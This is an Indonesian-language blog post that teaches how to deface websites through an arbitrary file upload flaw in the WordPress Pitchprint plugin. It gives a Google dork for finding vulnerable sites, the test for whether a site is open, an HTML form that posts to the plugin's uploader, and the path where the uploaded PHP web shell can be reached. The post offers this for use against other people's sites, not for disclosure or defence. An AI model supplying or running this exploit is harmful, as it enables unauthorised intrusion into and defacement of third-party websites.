Deface dengan WordPress Plugins Pitchprint

Unknown 07.25 Leave a Comment
Assalamualaikum sobat bloggers :D kali ini ane mau share exploit WordPress Plugins Pitchprint Arbitrary File Upload, langsung saja disimak ;)


Bahan - Bahan :

- Shell : ( Download )
- CSRF

Script CSRF :

<form method="POST" action="http://localhost/wp-content/plugins/pitchprint/uploader/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Langkah - Langkah :

1. Buka www.google.com, lalu masukan dork berikut :
    inurl:/wp-content/plugins/pitchprint/  ( Kembangin lagi )

2. Lalu pilih salah satu sitenya
3. Kalo sudah menemukan sitenya, masukan exploit berikut :
    "/wp-content/plugins/pitchprint/uploader/"

4. Jika vuln akan muncul text berikut :
     files[] 

5. Langkah selanjutnya adalah membuka CSRFnya :D
6. Save, dan buka CSRFnya lalu upload shell kalian
7. Jika sukses upload shell akan seperti gambar dibawah ini :
8. Kalo shellnya berhasil ke upload, tinggal buka deh =))

   Shell akses : http://localhost/wp-content/plugins/pitchprint/uploader/files/nama-shell-kalian.php

 
  
 Sekian tutornya dan Salam Ganteng,  Wassalamualaikum wr.wb :D
Next PostPosting Lebih Baru Previous PostPosting Lama Beranda

0 komentar:

Posting Komentar

Diberdayakan oleh Blogger.

Copyright © 2014 • Eitaro Attacker | BLOG

Blogger Templates Designed by VeeThemes.com